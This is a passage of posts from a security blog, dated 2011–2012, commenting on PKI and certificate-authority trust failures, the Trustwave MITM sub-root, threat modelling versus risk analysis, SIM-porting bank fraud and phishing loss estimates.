    Next time you read of the US government banging the cyberwar drum in order to rustle up budget for cyberwarriors, ask them if they've re-thought the equity issue, and why we would provide funds for something they created in the first place?

    Posted by iang at 06:50 AM | Comments (1) | TrackBack

    March 20, 2012

    More context on why context undermines threat modelling...

    Lynn was there at the beginning of SSL, and sees where I'm going with this. He writes in Comments:

    > I have a similar jaundiced view of a lot of the threat model stuff in the mid-late 90s ... Lots of parties had the solution (PKI) and they were using the facade of threat models to narrowly focus in portion of problem needing PKI as solution (they had the answer, now they needed to find the question). The industry was floating business plans on wall street $20B/annum for annual $100 digital certificates for individuals. We had been called in to help wordsmith the cal. state electronic signature legislation ... and the industry was heavily lobbying that the legislation mandate (annual, individual) digital certificates.


    Etc, etc. Yes. this is the thing that offends - there is a flaw in pure threat modelling, and that flaw was enough to drive an industry through. We're still paying the dead-weight costs, and will be for some time.

    The question is whether the flaw in threat modelling can be repaired by patches like "oh, you should consider the business" or whether we need to recognise that nobody ever does. Or can. Or gets paid to.

    In which case we need a change in metaphor. A new paradigm, as they say in the industry.

    I'm thinking the latter. Hence, Risk Analysis.

    Posted by iang at 10:41 AM | Comments (0) | TrackBack

    March 12, 2012

    Measuring the OODA loop of security thinking -- Can you say - firewalls & SSL?

    So, you want to know where the leading thinkers are in security today?

    Coviello called for the industry to rally together to take the following actions:
    -- Change how we think about security. The security industry must stop thinking linearly, "...blindly adding new controls on top of failed models. We need to recognize, once and for all, that perimeter-based defenses and signature-based technologies are past their freshness dates, and acknowledge that our networks will be penetrated. We should no longer be surprised by this," Coviello said.

    Can you say, firewalls & SSL? It's so long ago that this metaphor was published by Gunnar that I can't even remember. But here's his firewalls & SSL infosec debt clock, starting 1995.

    Posted by iang at 09:17 PM | Comments (3) | TrackBack

    February 28, 2012

    Serious about user security? Plonk down a million in prizes....

    Google offers $1 million reward to hackers who exploit Chrome
    By Dan Goodin | Published February 27, 2012 8:30 PM

    Google has pledged cash prizes totaling $1 million to people who successfully hack its Chrome browser at next week's CanSecWest security conference.

    Google will reward winning contestants with prizes of $60,000, $40,000, and $20,000 depending on the severity of the exploits they demonstrate on Windows 7 machines running the browser. Members of the company's security team announced the Pwnium contest on their blog on Monday. There is no splitting of winnings, and prizes will be awarded on a first-come-first-served basis until the $1 million threshold is reached.

    Now in its sixth year, the Pwn2Own contest at the same CanSecWest conference awards valuable prizes to those who remotely commandeer computers by exploiting vulnerabilities in fully patched browsers and other Internet software. At last year's competition, Internet Explorer and Safari were both toppled but no one even attempted an exploit against Chrome (despite Google offering an additional $20,000 beyond the $15,000 provided by contest organizer Tipping Point).

    Chrome is currently the only browser eligible for Pwn2Own never to be brought down. One reason repeatedly cited by contestants for its lack of attention is the difficulty of bypassing Google's security sandbox.

    "While we’re proud of Chrome’s leading track record in past competitions, the fact is that not receiving exploits means that it’s harder to learn and improve," wrote Chris Evans and Justin Schuh, members of the Google Chrome security team. "To maximize our chances of receiving exploits this year, we’ve upped the ante. We will directly sponsor up to $1 million worth of rewards."

    In the same blog post, the researchers said Google was withdrawing as a sponsor of the Pwn2Own contest after discovering rule changes allowing hackers to collect prizes without always revealing the full details of the vulnerabilities to browser makers.

    "Specifically, they do not have to reveal the sandbox escape component of their exploit," a Google spokeswoman wrote in an email to Ars. "Sandbox escapes are very dangerous bugs so it is not in the best interests of user safety to have these kept secret. The whitehat community needs to fix them and study them. Our ultimate goal here is to make the web safer."
    In a tweet, Aaron Portnoy, one of the Pwn2Own organizers, took issue with Google's characterization that the rules had changed and said that the contest has never required the disclosure of sandbox escapes.

    Ars will have full coverage of Pwn2Own, which commences on Wednesday, March 7.

    Posted by iang at 08:01 PM | Comments (0) | TrackBack

    February 18, 2012

    one week later - chewing on the last morsel of Trust in the PKI business

    After a week of fairly strong deliberations, Mozilla has sent out a message to all CAs to clarify that MITM activity is not acceptable.

    It would seem that Trustwave might slip through without losing their spot in the root list of major vendors. The reasons for this is a combination of: up-front disclosure, a short timeframe within which the subCA was issued and used (at this stage limited to 2011), and the principle of wiser heads prevailing.

    That's my assessment at least.

    My hope is that this has set the scene. The next discovery will be fatal for that CA. The only way forward for a CA that has issued at any time in the past an MITM-enabled subCA would be the following:

    + up-front disclosure to the public. By that I mean, not privately to Mozilla or other vendors. That won't be good enough. Nobody trusts the secret channels anymore.
    + in the event that this is still going on, an *fast* plan, agreed and committed to vendors, to withdraw completely any of these MITM sub-CAs or similar arrangements. By that I mean *with prejudice* to any customers - breaching contract if necessary.

    Any deviation means termination of the root. Guys, you got one free pass at this, and Trustwave used it up. The jaws of Trust are hungry for your response.

    That is what I'll be looking for at Mozilla. Unfortunately there is no forum for Google and others, so Mozilla still remains the bellwether for trust in CAs in general.

    That's not a compliment; it's more a description of how little trust there is. If there is a desire to create some, that's possibly where we'll see the signs.

    Posted by iang at 10:53 PM | Comments (1) | TrackBack

    The Convergence of PKI

    Last week's post on the jaws of Trust sparked a bit of interest, and Chris asks what I think about Convergence in comments. I listened to this talk by Moxie Marlinspike, and it is entertaining.

    The 'new idea' is not difficult. The idea of Convergence is for independent operators (like CAcert or FSFE or FSF) to run servers that cache certificates from sites. Then, when a user browser comes across a new certificate, instead of accepting the fiat declaration from the CA, it gets a "second opinion" from one of these caching sites.

    Convergence is best seen as conceptually extending or varying the SSH or TOFU model that has already been tried in browsers through CertPatrol, Trustbar, Petnames and the like.

    In the Trust-on-first-use model, we can make a pretty good judgement call that the first time a user comes to a site, she is at low risk. It is only later on when her relationship establishes (think online banking) that her risk rises.

    This risk works because likelihood of an event is inversely aligned with the cost of doing that attack. One single MITM might be cost X, two might be X+delta, so as it goes on it gets more costly. In two ways: firstly, in maintaining the MITM over time against Alice costs go up more dramatically than linear additions of a small delta. In this sense, MITMs are like DOSs, they are easier to mount for brief periods. Secondly, because we don't know of Alice's relationship before hand, we have to cast a very broad net, so a lot of MITMs are needed to find the minnow that becomes the whale.

    First-use-caching or TOFU works then because it forces the attacker into an uneconomic position - the easy attacks are worthless.

    Convergence then extends that model by using someone else's cache, thus further boxing the attacker in. With a fully developed Convergence network in place, we can see that the attacker has to conduct what amounts to being a perfect MITM closer to the site than any caching server (at least at the threat modelling level).

    Which in effect means he owns the site at least at the router level, and if that is true, then he's probably already inside and prefers more sophisticated breaches than mucking around with MITMs.

    Thus, the very model of a successful mitigation -- this is a great risk for users to accept if only they were given the chance! It's pretty much ideal on paper.

    Now move from paper threat modelling to *the business*. We can ask several questions. Is this better than the fiat or authority model of CAs which is in place now? Well, maybe. Assuming a fully developed network, Convergance is probably in the ballpark. A serious attacker can mount several false nodes, something that was seen in peer2peer networks. But a serious attacker can take over a CA, something we saw in 2011.

    Another question is, is it cheaper? Yes, definately. It means that the entire middle ground of "white label" HTTPS certs as Mozilla now shows them can use Convergence and get approximately the same protection. No need to muck around with CAs. High end merchants will still go for EV because of the branding effect sold to them by vendors.

    A final question is whether it will work in the economics sense - is this going to take off? Well, I wish Moxie luck, and I wish it work, but I have my reservations.

    Like so many other developments - and I wish I could take the time to lay out all the tall pioneers who provided the high view for each succeeding innovation - where they fall short is they do not mesh well with the current economic structure of the market.

    In particular, one facet of the new market strikes me as overtaking events: the über-CA. In this concept, we re-model the world such that the vendors are the CAs, and the current crop are pushed down (or up) to become sub-CAs. E.g., imagine that Mozilla now creates a root cert and signs individually each root in their root list, and thus turns it into a sub-root list. That's easy enough, although highly offensive to some.

    Without thinking of the other ramifications too much, now add Convergance to the über-CA model. If the über-CA has taken on the responsibility, and manages the process end to end, it can also do the Convergence thing in-house. That is, it can maintain its set of servers, do the crawling, do the responding. Indeed, we already know how to do the crawling part, most vendors have had a go at it, just for in-house research.

    Why do I think this is relevant? One word - google. If the Convergence idea is good (and I do think it is) then google will have already looked at it, and will have already decided how to do it more efficiently. Google have already taken more steps towards ueber-CA with their decision to rewire the certificate flow. Time for a bad haiku.

    Google sites are pinned now / All your 'vokes are b'long to us / Cache your certs too, soon.

    And who is the world's expert at rhyming data?

    Which all goes to say that Convergence may be a good idea, a great one even, but it is being overtaken by other developments. To put it pithily the market is converging on another direction. 1-2 years ago maybe, yes, as google was still working on the browser at the standards level. Now google are changing the way things are done, and this idea will fall out easily in their development.

    (For what it is worth, google are just as likely to make their servers available for other browsers to use anyway, so they could just "run" the Convergance network. Who knows. The google talks to no-one, until it is done, and often not even then.)

    Posted by iang at 07:21 PM | Comments (2) | TrackBack

    February 09, 2012

    PKI and SSL - the jaws of trust snap shut

    As we all know, it's a right of passage in the security industry to study the SSL business of certificates, and discover that all's not well in the state of Denmark. But the business of CAs and PKI rolled on regardless, seemingly because no threat ever challenged it. Because there was no risk, the system successfully dealt with the threats it had set itself. Which is itself elegant proof that academic critiques and demonstrations and phishing and so forth are not real attacks and can be ignored entirely...

    Until 2011.

    Last year, we crossed the Rubicon for the SSL business -- and by extension certificates, secure browsing, CAs and the like -- with a series of real attacks against CAs. Examples include the DigiNotar affair, the Iranian affair (attacks on around 5 CAs), and also the lesser known attack a few months back where certificates may have been forged and may have been used in an APT and may have... a lot of things. Nobody's saying.

    Either way, the scene is set. The pattern has emerged, the Rubicon is crossed, it gets worse from here on in. A clear and present danger, perhaps? In California, they'd be singing "let's partly like it's 2003," the year that SB1386 slid past our resistance and set the scene for an industry an industry debacle in 2005.

    But for us long term observers, no party. There will now be a steady series of these shocks, and journalists will write of our brave new world - security but no security.

    With one big difference. Unlike the SB1386 breach party, where we can rely on companies not going away (even as our data does), the security system of SSL and certificates is somewhat optional. Companies can and do expose their data in different ways. We can and do invent new systems to secure or mitigate the damage. So while SB1386 didn't threaten the industry so much as briskly kicked it around, this is different.

    At an attacks level, we've crossed a line, but at a wider systems level, we stand on the line.

    And that line is a cliff.

    Which brings us to this week's news. A CA called Trustwave has just admitted to selling a sub-root for the explicit purpose of MITM'ing. Read about that elsewhere.



    Now, we've known that MITMing for fun and profit was going on for a long time. Mozilla's community first learnt of it in the mid 2000s as it was finalising its policy on CAs (a ground-breaking work that I was happy to be involved with). At that time, accusations were circulating against unknown companies listing their roots for the explicit purpose of doing MITMs on unwitting victims. Which raised the hairs, eyebrows and heckles on not a few of us. These accusations have been repeated from time to time, but in each case the "insiders" begged off on the excuse: we cannot break NDA or reputation.

    Each time then the industry players were likewise able to fob it off. Hard Evidence? none. Therefore, it doesn't exist, was they industry's response. We knew as individuals, yet as an industry we knew not.

    We are all agreed it does exist and it doesn't. We all have jobs to preserve, and will practice cognitive dissonance to the very end.

    Of course this situation couldn't last, because a secret of this magnitude never survives. In this case, the company that sold the MITM sub-root, Trustwave, has looked at 2011, and realised the profit from that one CA isn't worth the risk of the DigiNotar experience (bankruptcy). Their decision is to 'fess up now, take it on the chin, because later may be too late.

    Which leads to a dilemma, and we the players have divided on each side, one after the other, of that dilemma:

    To drop the Trustwave root, or not?



    That is the question. First the case for the defence: On the one hand, we applaud the honesty of a CA coming forward and cleaning up house. It's pretty clear that we need our CAs to do this. Otherwise we're not going to get anywhere with this Trust thing. We need to encourage the CAs to work within the system.

    Further, if we damage a CA, we damage customers. The cost to lost business is traumatic, and the list of US government agencies that depend on this CA has suddenly become impressive. Just like DigiNotar, it seems, which spread like a wave of mistrust through the government IT departments of the Netherlands. Also, we have to keep an eye on (say) a bigger more public facing CA going down in the aftermath - and the damage to all its customers. And the next, etc.

    Is lost business more important than simple faith in those silly certificates? I think lost business is much more important - revenue, jobs, money flowing keeping all of the different parts of the economy going are our most important asset. Ask any politician in USA or Europe or China; this is their number one problem!

    Finally, it is pretty clear and accepted that the business purpose to which the sub-Root was put was known and tolerated. Although it is uncomfortable to spy on ones employees, it is just business. Organisations own their data systems, have the responsibility to police them, and have advised their people that this is what they are going to do. SSL included, if necessary.

    This view has it that Trustwave has done the right thing. Therefore, pass. And, the more positive proponents suggest an amnesty, after which period there is summary execution for the sins - root removal from the list distributed by the browsers. It's important to not cause disruption.



    Now the case for the Prosecution! On the other hand, damn spot: the CA clearly broke their promise. Out!

    Three ways, did they breach the trust: It is expressed in the Mozilla policy and presumably of others that certificates are only issued to people who own/control their domains. This is no light or optional thing -- we rely on the policy because CAs and Mozilla and other vendors and auditors and all routinely practice secrecy in this business.

    We *must rely on the policy* because they deny us the right to rely on anything else!

    Secondly, it is what the public believe in, it is the expectations of any purchaser or user of the product, written or not. It is a simple message, and brooks no complicated exceptions. Either your connection is secure to your online bank, and nobody else can see it *including your employer or IT department*. Or not.

    Try explaining this exception to your grandmother, if the words do not work for you.

    Finally, the raison d'être: it is the purpose and even the entire goal of the certificate design to do exactly the opposite. The reason we have CAs like TrustWave is to stop the MITM. If they don't stop the MITM, then *we don't need the heavyweight certificate system*, we don't need CAs, and we don't need Mozilla's root list or that of any other vendor.

    We can do security much more cost-effectively if we drop the 100% always-on absolutist MITM protection.

    Given this breach of trust, what else can we trust in? Can we trust their promises that the purpose was maintained? That the cert never left the building? That secret traffic wasn't vectored in? That HSMs are worth something and audits ensure all is well in Denmark?

    This rather being a problem with trust. Lie once, lose it.



    There being two views presented, it has to be said that both views are valid. The players are lining up on either side of the line, but they probably aren't so well aware of where this is going.

    Only one view is going to win out. Only one side wins this fight.

    And in so-doing, in winning, the winner sews the seeds for own destruction.

    Because if you religiously take your worldview, and look at the counter-argument to your preferred position, your thesis crumbles for the fallacies.

    The jaws of trust just snapped shut on the players who played too long, too hard, too profitably.

    Like the financial system. We are no longer worried about the bankruptcy of one or two banks or a few defaults by some fly specks on the map of European. We are now looking at a change that will ripple out and remove what vestiges of purpose and faith were left in PKI. We are now looking at all the other areas of the business that will be effected; ones that brought into the promise even though they knew they shouldn't have.

    Like the financial system, a place of uncanny similarity, each new shock makes us wonder and question. Wasn't all this supposed to be solved? Where are the experts? Where is the trust?

    We're about to find out the timeless meaning of Caveat Emptor.

    Posted by iang at 10:54 PM | Comments (7) | TrackBack

    January 29, 2012

    Why Threat Modelling fails in practice

    I've long realised that threat modelling isn't quite it.

    There's some malignancy in the way the Internet IT Security community approached security in the 1990s that became a cancer in our protocols in the 2000s. Eventually I worked out that the problem with the aphorism What's Your Threat Model (WYTM?) was the absence of a necessary first step - the business model - which lack permitted threat modelling to be de-linked from humanity without anyone noticing.

    But I still wasn't quite there, it still felt like wise old men telling me "learn these steps, swallow these pills, don't ask for wisdom."

    In my recent risk management work, it has suddenly become clearer. Taking from notes and paraphrasing, let me talk about threats versus risks, before getting to modelling.

    A threat is something that threatens, something that can cause harm, in the abstract sense. For example, a bomb could be a threat. So could an MITM, an eavesdropper, or a sniper.

    But, separating the abstract from the particular, a bomb does not necessarily cause a problem unless there is a connection to us. Literally, it has to be capable of doing us harm, in a direct sense. For this reason, the methodologists say:

    Risk = Threat * Harm

    Any random bomb can't hurt me, approximately, but a bomb close to me can. With a direct possibility of harm to us, a threat becomes a risk. The methodologists also say:

    Risk = Consequences * Likelihood

    That connection or context of likely consequences to us suddenly makes it real, as well as hurtful.

    A bomb then is a threat, but just any bomb doesn't present a risk to anyone, to a high degree of reliability. A bomb under my car is now a risk! To move from threats to risks, we need to include places, times, agents, intents, chances of success, possible failures ... *victims* ... all the rest needed to turn the abstract scariness into direct painful harm.

    We need to make it personal.

    To turn the threatening but abstract bomb from a threat to a risk, consider a plane, one which you might have a particular affinity to because you're on it or it is coming your way:

    ⇒ people dying
    ⇒ financial damage to plane
    ⇒ reputational damage to airline
    ⇒ collateral damage to other assets
    ⇒ economic damage caused by restrictions
    ⇒ war, military raids and other state-level responses

    Lots of risks! Speaking of bombs as planes: I knew someone booked on a plane that ended up in a tower -- except she was late. She sat on the tarmac for hours in the following plane.... The lovely lady called Dolly who cleaned my house had a sister who should have been cleaning a Pentagon office block, but for some reason ... not that day. Another person I knew was destined to go for coffee at ground zero, but woke up late. Oh, and his cousin was a fireman who didn't come home that day.

    Which is perhaps to say, that day, those risks got a lot more personal.

    We all have our very close stories to tell, but the point here is that risks are personal, threats are just theories.

    Let us now turn that around and consider *threat modelling*. By its nature, threat modelling only deals with threats and not risks and it cannot therefore reach out to its users on a direct, harmful level. Threat modelling is by definition limited to theoretical, abstract concerns. It stops before it gets practical, real, personal.

    Maybe this all amounts to no more than a lot of fuss about semantics?

    To see if it matters, let's look at some examples: If we look at that old saw, SSL, we see rhyme. The threat modelling done for SSL took the rather abstract notions of CIA -- confidentiality, integrity and authenticity -- and ended up inverse-pyramiding on a rather too-perfect threat of MITM -- Man-in-the-Middle.

    We can also see from the lens of threat analysis versus risk analysis that the notion of creating a protocol to protect any connection, an explicit choice of the designers, led to them not being able to do any risk analysis at all; the notion of protecting certain assets such as credit cards as stated in the advertising blurb was therefore conveniently not part of the analysis (which we knew, because any risk analysis of credit cards reveals different results).

    Threat modelling therefore reveals itself to be theoretically sound but not necessarily helpful. It is then no surprise that SSL performed perfectly against its chosen threats, but did little to offend the risks that users face. Indeed, arguably, as much as it might have stopped some risks, it helped other risks to proceed in natural evolution. Because SSL dealt perfectly with all its chosen threats, it ended up providing a false sense of false security against harm-incurring risks (remember SSL & Firewalls?).

    OK, that's an old story, and maybe completely and boringly familiar to everyone else? What about the rest? What do we do to fix it?

    The challenge might then be to take Internet protocol design from the very plastic, perfect but random tendency of threat modelling and move it forward to the more haptic, consequences-directed chaos of risk modelling.

    Or, in other words, we've got to stop conflating threats with risks.

    Critics can rush forth and grumble, and let me be the first: Moving to risk modelling is going to be hard, as any Internet protocol at least at the RFC level is generally designed to be deployed across an extremely broad base of applications and users.

    Remember IPSec? Do you feel the beat? This might be the reason why we say that only end-to-end security cuts the mustard, because end-to-end implies an application, and this draw in the users to permit us to do real risk modelling.

    It might then be impossible to do security at the level of an Internet-wide, application-free security protocol, a criticism that isn't new to the IETF. Recall the old ISO layer 5, sometimes called "the security layer" ?

    But this doesn't stop the conclusion: threat modelling will always fail in practice, because by definition, threat modelling stops before practice. The place where users are being exposed and harmed can only be investigated by getting personal - including your users in your model. Threat modelling does not go that far, it does not consider the risks against any particular set of users that will be harmed by those risks in full flight. Threat modelling stops at the theoretical, and must by the law of ignorance fail in the practical.

    Risks are where harm is done to users. Risk modelling therefore is the only standard of interest to users.

    Posted by iang at 02:02 PM | Comments (6) | TrackBack

    January 21, 2012

    for bright times for CISOs ... turn on the light!

    Along the lines of "The CSO should have an MBA" we have some progress:

    City University London will offer a new postgraduate course from September, designed to help information security and risk professionals progress to managerial roles.

    The new Masters in Information Security and Risk (MISR) aims to address a gap in the market for IT professionals that can “speak business”. One half of the course is devoted to security strategy, risk management and security architecture, while the other half focuses on putting this into a business-oriented context.

    “Talking to people out in the industry, particularly if you go to the financial sector, they say one real problem is they don't have a security person who they can take along to the board meeting without having to act as an interpreter; so we're putting together a programme to address this need,” explained course director Professor Kevin Jones, speaking at the Infosecurity Europe Press Conference in London yesterday.

    Posted by iang at 04:48 AM | Comments (0) | TrackBack

    December 08, 2011

    Two-channel breached: a milestone in threat evaluation, and a floor on monetary value

    Readers will know we first published the account on "Man in the Browser by Philipp Güring way back when, and followed it up with news that the way forward was dual channel transaction signing. In short, this meant the bank sending an SMS to your handy mobile cell phone with the transaction details, and a check code to enter if you wanted the transaction to go through.

    On the face of it, pretty secure. But at the back of our minds, we knew that this was just an increase in difficulty: a crook could seek to control both channels. And so it comes to pass:

    In the days leading up to the fraud being committed, [Craig] had received two strange phone calls. One came through to his office two-to-three days earlier, claiming to be a representative of the Australian Tax Office, asking if he worked at the company. Another went through to his home number when he was at work. The caller claimed to be a client seeking his mobile phone number for an urgent job; his daughter gave out the number without hesitation.

    The fraudsters used this information to make a call to Craig’s mobile phone provider, Vodafone Australia, asking for his phone number to be “ported” to a new device.

    As the port request was processed, the criminals sent an SMS to Craig purporting to be from Vodafone. The message said that Vodafone was experiencing network difficulties and that he would likely experience problems with reception for the next 24 hours. This bought the criminals time to commit the fraud.

    The unintended consequence of the phone being used for transaction signing is that the phone is now worth maybe as much as the fraud you can pull off. Assuming the crooks have already cracked the password for the bank account (something probably picked up on a market for pennies), the crooks are now ready to spend substantial amounts of time to crack the phone. In this case:

    Within 30 minutes of the port being completed, and with a verification code in hand, the attackers were spending the $45,000 at an electronics retailer.

    Thankfully, the abnormally large transaction raised a red flag within the fraud unit of the Commonwealth Bank before any more damage could be done. The team tried – unsuccessfully – to call Craig on his mobile. After several attempts to contact him, Craig’s bank account was frozen. The fraud unit eventually reached him on a landline.

    So what happens now that the crooks walked with $45k of juicy electronics (probably convertible to cash at 50-70% off face over ebay) ?

    As is standard practice for online banking fraud in Australia, the Commonwealth Bank has absorbed the hit for its customer and put $45,000 back into Craig's account.

    A NSW Police detective contacted Craig on September 15 to ensure the bank had followed through with its promise to reinstate the $45,000. With this condition satisfied, the case was suspended on September 29 pending the bank asking the police to proceed with the matter any further.

    One local police investigator told SC that in his long career, a bank has only asked for a suspended online fraud case to be investigated once. The vast majority of cases remain suspended. Further, SC Magazine was told that the police would, in any case, have to weigh up whether it has the adequate resources to investigate frauds involving such small amounts of money.

    No attempt was made at a local police level to escalate the Craig matter to the NSW Police Fraud and Cybercrime squad, for the same reasons.

    In a paper I wrote in 2008, I stated for some value below X, police wouldn't lift a finger. The Prosecutor has too much important work to do! What we have here is a very definate floor beyond which Internet systems which transmit and protect value are unable to rely on external resources such as the law . Reading more:

    But the Commonwealth Bank claims it has forwarded evidence to the NSW and Federal Police forces that could have been used to prosecute the offenders.

    The bank’s fraud squad – which had identified the suspect transactions within minutes of the fraud being committed - was able to track down where the criminals spent the stolen money.

    A spokesman for the bank said it “dealt with both Federal and State (NSW) Police regarding the incident” and that “both authorities were advised on the availability of CCTV footage” of the offenders spending their ill-gotten gains.

    “The Bank was advised by one of the authorities that the offender had left the country – reducing the likelihood of further action by that authority,” the spokesperson said.

    This number goes up dramatically once we cross a border. In that paper I suggested 25k, here we have a reported number of $45k.

    Why is that important? Because, some systems have implicit guarantees that go like "we do blah and blah and blah, and then you go to the police and all your problems are solved!" Sorry, not if it is too small, where small is surprisingly large. Any such system that handwaves you to the police without clearly indicating the floor of interest ... is probably worthless.

    So when would you trust a system that backstopped to the police? I'll stick my neck out and say, if it is beyond your borders, and you're risking >> $100k, then you might get some help. Otherwise, don't bet your money on it.

    Posted by iang at 04:34 PM | Comments (5) | TrackBack

    October 26, 2011

    Phishing doesn't really happen? It's too small to measure?

    Two Microsoft researchers have published a paper pouring scorn on claims cyber crime causes massive losses in America. They say it’s just too rare for anyone to be able to calculate such a figure.

    Dinei Florencio and Cormac Herley argue that samples used in the alarming research we get to hear about tend to contain a few victims who say they lost a lot of money. The researchers then extrapolate that to the rest of the population, which gives a big total loss estimate – in one case of a trillion dollars per year.

    But if these victims are unrepresentative of the population, or exaggerate their losses, they can really skew the results. Florencio and Herley point out that one person or company claiming a $50,000 loss in a sample of 1,000 would, when extrapolated, produce a $10 billion loss for America as a whole. So if that loss is not representative of the pattern across the whole country, your total could be $10 billion too high.

    Having read the paper, the above is about right. And sufficient description, as the paper goes on for pages and pages making the same point.

    Now, I've also been skeptical of the phishing surveys. So, for a long time, I've just stuck to the number of "about a billion a year." And waited for someone to challenge me on it :) Most of the surveys seemed to head in that direction, and what we would hope for would be more useful numbers.

    So far, Florencio and Herley aren't providing those numbers. The closest I've seen is the FBI-sponsored report that derives from reported fraud rather than surveys. Which seems to plumb in the direction of 10 billion a year for all identity-related consumer frauds, and a sort handwavy claim that there is a ration of 10:1 between all fraud and Internet related fraud.

    I wouldn't be surprised if the number was really 100 million. But that's still a big number. It's still bigger than income of Mozilla, which is the 2nd browser by numbers. It's still bigger than the budget of the Anti-phishing Working Group, an industry-sponsored private thinktank. And CABForum, another industry-only group.

    So who benefits from inflated figures? The media, because of the scare stories, and the public and private security organisations and businesses who provide cyber security. The above parliamentary report indicated that in 2009 Australian businesses spent between $1.37 and $1.95 billion in computer security measures. So on the report’s figures, cyber crime produces far more income for those fighting it than those committing it.

    Good question from the SMH. The answer is that it isn't in any player's interest to provide better figures. If so (and we can see support from the Silver Bullets structure) what is Florencio and Herley's intent in popping the balloon? They may be academically correct in trying to deflate the security market's obsession with measurable numbers, but without some harder numbers of their own, one wonders what's the point?

    What is the real number? Florencio and Herley leave us dangling at that point. Are they are setting up to provide those figures one day? Without that forthcoming, I fear the paper is destined to be just more media fodder as shown in its salacious title. Iow, pointless.

    Hopefully numbers are coming. In an industry steeped in Numerology and Silver Bullets, facts and hard numbers are important. Until then, your rough number is as good as mine -- a billion.

    Posted by iang at 05:05 PM | Comments (2) | TrackBack

    October 23, 2011

    HTTPS everywhere: Google, we salute you!

    Google radically expanded Tuesday its use of bank-level security that prevents Wi-Fi hackers and rogue ISPs from spying on your searches.

    Starting Tuesday, logged-in Google users searching from Google’s homepage will be using https://google.com, not http://google.com — even if they simply type google.com into their browsers. The change to encrypted search will happen over several weeks, the company said in a blog post Tuesday.


    We have known for a long time that the answer to web insecurity is this: There is only one mode, and it is secure.

    (I use the royal we here!)

    This is evident in breaches led by phishing, as the users can't see the difference between HTTP and HTTPS. The only solution at several levels is to get rid of HTTP. Entirely!

    Simply put, we need SSL everywhere.

    Google are seemingly the only big corporate that have understood and taken this message to heart.

    Google has been a leader in adding SSL support to cloud services. Gmail is now encrypted by default, as is the company’s new social network, Google+. Facebook and Microsoft’s Hotmail make SSL an option a user must choose, while Yahoo Mail has no encryption option, beyond its intial sign-in screen.

    EFF and CAcert are small organisations that are doing it as and when we can... Together, security-conscious organisations are slowly migrating all their sites to SSL and HTTPS all the time.

    It will probably take a decade. Might as well start now -- where's your organisation's commitment to security? Amazon, Twitter, Yahoo? Facebook!

    Posted by iang at 05:24 AM | Comments (2) | TrackBack

    October 13, 2011

    Founders of SSL call game over?

    RSA's Coviello declares the new threat environment:

    "Organisations are defending themselves with the information security equivalent of the Maginot Line as their adversaries easily outflank perimeter defences," Coviello added. "People are the new perimeter contending with zero-day malware delivered through spear-phishing attacks that are invisible to traditional perimeter-based security defences such as antivirus and intrusion detection systems." ®

    The recent spate of attacks do not tell us that the defences are weak - this is something we've known for some time. E.g., from 20th April, 2003, "The Maginot Web" said it. Yawn. Taher Elgamal, the guy who did the crypto in SSL at Netscape back in 1994, puts it this way:

    How about those certificate authority breaches against Comodo and that wiped out DigiNotar?

    It's a combination of PKI and trust models and all that kind of stuff. If there is a business in the world that I can go to and get a digital certificate that says my name is Tim Greene then that business is broken, because I'm not Tim Greene, but I've got a certificate that says this is my name. This is a broken process in the sense that we allowed a business that is broken to get into a trusted circle. The reality is there will always be crooks, somebody will always want to make money in the wrong way. It will continue to happen until the end of time.

    Is there a better way than certificate authorities?

    The fact that browsers were designed with built-in root keys is unfortunate. That is the wrong thing, but it's very difficult to change that. We should have separated who is trusted from the vendor. ...

    What the recent rash of exploits signal is that the attackers are now lined up and deployed against our weak defences:

    Coviello said one of the ironies of the attack was that it validated trends in the market that had prompted RSA to buy network forensics and threat analysis firm NetWitness just before the attack.

    This is another unfortunate hypothesis in the market for silver bullets: we need real attacks to tell us real security news. OK, now we've got it. Message heard, loud and clear. So, what to do? Coviello goes on:

    Security programs need to evolve to be risk-based and agile rather than "conventional" reactive security, he argued.

    "The existing perimeter is not enough, which is why we bought NetWitness. The NetWitness technology allowed us to determine damage and carry out remediation very quickly," Coviello said.


    The existing perimeter was an old idea - one static defence, and the attacker would walk up, hit it with his head, and go elsewhere in confusion. Build it strong, went the logic, and give the attacker a big headache! ... but the people in charge at the time were steeped in the school of cryptology and computer science, and consequently lacked the essential visibility over the human aspects of security to understand how limiting this concept was, and how the attacker was blessed with sight and an ability to walk around.

    Risk management throws out the old binary approach completely. To some extent, it is just in time, as a methodology. But to a large extent, the market place hasn't moved. Like deer in headlights, the big institutions watch the trucks approach, looking at each other for a solution.

    Which is what makes these comments by RSA and Taher Elgamal significant. More than others, these people built the old SSL infrastructure. When the people who built it call game over, it's time to pay attention.

    Posted by iang at 10:31 AM | Comments (5) | TrackBack

    August 01, 2011

    A tale of phishers, CAs, vendors and losers: I've come to eat your babies!

    We've long documented the failure of PKI and secure browsing to be an effective solution to security needs. Now comes spectacular proof: sites engaged in carding, which is the trading of stolen credit card information, have always protected their trading sites with SSL certs of the self-signed variety. According to brief searching on 'a bunch of generic "sell CVV", "fullz", "dumps" ones,' conducted informally by Peter Gutmann, some of the CAs are now issuing certificates to carders.

    This amounts to a new juvenile culinary phase in the target-rich economy of cyber-crime:

    Phisher: I've come to eat your babies!
    CA: Oh, yes, you'll be needing a certificate for that, $200 thanks!

    Although not scientifically conducted or verified, both Mozilla and the CA concerned inclined that the criminals can have their certs and eat them too. As long as they follow the same conditions as everyone else, that's fine.

    Except, it's not. Firstly, it's against the law in most all places to aid & abet a criminal. As Blackstone put it (ex Wikipedia):

    "AN accessory after the fact may be, where a person, knowing a felony to have been committed, receives, relieves, comforts, or assists the felon.17 Therefore, to make an accessory ex post facto, it is in the first place requisite that he knows of the felony committed.18 In the next place, he must receive, relieve, comfort, or assist him. And, generally, any assistance whatever given to a felon, to hinder his being apprehended, tried, or suffering punishment, makes the assistor an accessory. As furnishing him with a horse to escape his pursuers, money or victuals to support him, a house or other shelter to conceal him, or open force and violence to rescue or protect him."

    The point here made by Blackstone, and translated into the laws of many lands is that the assistance given is not specific, but broad. If we are in some sense assisting in the commission of the crime, then we are accessories. For which there are penalties.

    And, these penalties are as if we were the criminals. For those who didn't follow the legal blah blah above, the simple thing is this: it's against the law. Go to jail, do not pass go, do not collect $200.

    Secondly, consider the security diaspora. Users were hoping that browsers such as Firefox, IE, etc, would protect them from phishing. The vendors' position, policy-wise and code-wise, is that their security mechanism to protect their users from phishing is to provide PKI certificates, which might evidence some level of verification on your counter-party. This reduces down to a single statement: if you are ripped off with someone who uses a cert against you, you might know something about them.

